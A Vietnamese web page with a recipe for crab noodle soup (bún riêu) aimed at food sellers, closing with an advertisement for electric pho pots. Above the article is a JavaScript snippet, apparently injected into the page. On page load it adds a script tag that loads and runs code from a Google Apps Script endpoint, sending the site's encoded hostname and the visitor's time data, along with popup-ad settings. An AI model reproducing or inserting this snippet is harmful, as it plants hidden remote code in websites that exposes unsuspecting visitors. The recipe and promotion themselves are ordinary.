var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Bí quyết nấu bún riêu kinh doanh ngon, chuẩn vị ăn hoài không chán

Bạn đang có ý định muốn kinh doanh bún riêu cua, nhưng không biết cách nấu sao cho ngon, hấp dẫn. Vậy thì bài viết dưới đây chúng tôi sẽ hướng dẫn bạn cách nấu bún riêu cua ngon, hấp dẫn thu hút được nhiều khách hàng nhé!

1. Cách nấu bún riêu của ngon, chuẩn vị

Bún riêu là món ăn khá quen thuộc đối với người dân Việt Nam. Đặc trưng của bún riêu là có hương vị ngọt đậm, nước dùng hơi chua, dậy mùi thơm của cua đồng. Để tăng thêm hương vị cho bát bún thì người ăn có thể cho thêm một chút mắm tôm và ăn kèm với rau sống.

Nguyên liệu cần chuẩn bị

  • Bún tươi: 1kg

  • Xương ống heo: 1,5kg

  • Cua đồng: 500 gram

  • Thịt xay: 100 gram

  • Trứng gà: 2 quả

  • Muối: 1 muỗng cà phê

  • Cà chua: 5 quả

  • Đậu phụ chiên: 5 miếng

  • Me chua 2 quả

  • Tôm khô: 100 gram

  • Mắm tôm

  • Hành lá, hành tím, rau mùi

  • Gia vị: dầu ăn, muối, hạt tiêu, đường, hạt nêm, nước mắm

  • Rau sống ăn kèm

Lưu ý: Mức nguyên liệu trên chỉ đủ cho 4 – 5 bát bún riêu. Nếu kinh doanh bạn sẽ cần phải chuẩn bị nguyên liệu nhiều hơn.

Cách làm

  • Bước 1: Sơ chế nguyên liệu

Phần nước hầm xương: Xương ống heo cho vào một nồi nước thêm muối, sau đó đun sôi lên rồi vớt ra rửa sạch lại với nước. Sau khi rửa sạch thì cho xương vào nồi nước khác và đun sôi, để lửa nhỏ và đun tiếp khoảng 45 – 60 phút.

Phần cua đồng: Cua đồng mua về bạn ngâm với muối sạch khoảng 3 tiếng rồi rửa sạch lại với nước. Sau đó bóc bỏ mai yếm và mai cua rồi dùng tăm hoặc thìa nhỏ lấy hết phần gạch cua màu vàng để riêng ra một cái bát. Gạch cua đem ướp với một chút tiêu và hạt nêm.

Phần mai cua đem xay hoặc giã nhuyễn, sau đó lọc lấy nước.

  • Bước 2: Nấu nước lèo

Tiếp theo bạn cho một chút muối, hạt nêm, đường vào nồi nước cua vừa lọc, sau đó cho lên bếp đun sôi. Lưu ý là đun ở lửa nhỏ để khi sôi nước không bị trào ra ngoài nhé.

Cà chua đem xào qua rồi cho vào nồi nước cua vừa đun sôi, nêm thêm mắm tôm, các loại gia vị khác cho tới khi vừa khẩu vị ăn là được. Tiếp đến bạn đổ phần gạch cua vào nồi, đun chín rồi vớt phần thịt và gạch cua ra một cái bát riêng. Sau đó, bạn đổ nước cua vào nồi nước hầm xương và đun ở lửa nhỏ thêm khoảng 20 phút nữa.

  • Bước 3: Làm chả tôm thịt

Tôm khô rửa sạch, đem ngâm với nước ấm cho thịt mềm ra rồi mang đi xay nhuyễn. Sau đó cho thịt xay, trứng gà, hành lá, tỏi băm, tiêu xay, hạt nêm, nước mắm vào và trộn đều lên.

Sau đó, bạn dùng muỗng múc từng phần nhỏ rồi thả vào nồi nước riêu cua và đun sôi cho đến khi chả nổi lên trên bề mặt nước là chín.

Đậu hũ cắt nhỏ, rán vàng

Cuối cùng, bắc chảo lên bếp, cho dầu ăn vào đun nóng rồi cho hành khô vào phi thơm để cho vào canh cho dậy mùi thơm.

  • Bước 4: Thành phẩm

Cho bún, hành lá vào bát tô rồi chan nước riêu cua và phần nước màu lên lên, sau đó cho gạch cua, đậu rán vào. Như vậy là bạn đã có bát bún riêu cua thơm ngon chuẩn vị rồi đấy. Khi ăn bạn có thể cho chút giấm, ớt và ăn kèm với rau sống để tăng thêm hương vị cho món ăn.

2. Bí quyết làm nên món bún riêu ngon, thành công thu hút được nhiều khách hàng

Để món bún riêu được ngon, chuẩn vị thì phần nước dùng cũng như phần gạch cua phải thật ngon, ngọt thì mới được. Bên cạnh đó, phần chả tôm phải được nêm nếm gia vị sao cho vừa ăn, không được nêm quá mặn cũng như quá nhạt.

Màu của bún riêu phải có màu đỏ cam, phải dậy mùi của cua, hành phi, đậu rán và chả tôm.

Ngoài ra, để tạo ra được món ăn thì dụng cụ nấu cũng góp phần làm nên chất lượng của món ăn. Trước kia, việc nấu bún riêu thường được nấu trên bếp củi hoặc bếp than, việc này vừa làm ảnh hưởng đến chất lượng của món ăn cũng như vừa mất an toàn vệ sinh thực phẩm.

Nhưng ngày nay, việc nấu bún riêu trở nên rất nhanh chóng và tiết kiệm được khá nhiều thời gian nhờ vào nồi nấu phở bằng điện. Nồi nấu phở bằng điện tích hợp được hai yếu tố bếp và nồi, do đó giúp tiết kiệm được không gian và giảm sức lao động cho người dùng.

Có rất nhiều lý do để bạn lựa chọn nồi nấu phở bằng điện.

  • Nồi nấu phở bằng điện giúp bạn tiết kiệm được diện tích không gian cũng như thời gian làm việc

  • Dễ dàng đun nấu và làm sạch

  • Chất lượng món ăn được ngon hơn

  • Đa chức năng nấu nướng, nên bạn có thể dễ dàng phục vụ khách hàng một cách nhanh chóng hơn

Như vậy, bài viết trên đây chúng tôi đã giúp bạn đưa ra cách nấu bún riêu kinh doanh ngon chuẩn vị. Hy vọng, cách nấu chúng tôi đưa ra sẽ giúp ích cho quá trình kinh doanh của bạn.

Nếu như bạn có nhu cầu mua nồi nấu phở bằng điện để tiện lợi hơn cho quá trình kinh doanh của mình thì có thể liên hệ với Inox Quang Huy qua số Hotline 0379.377.888 để được tư vấn hỗ trợ nhé!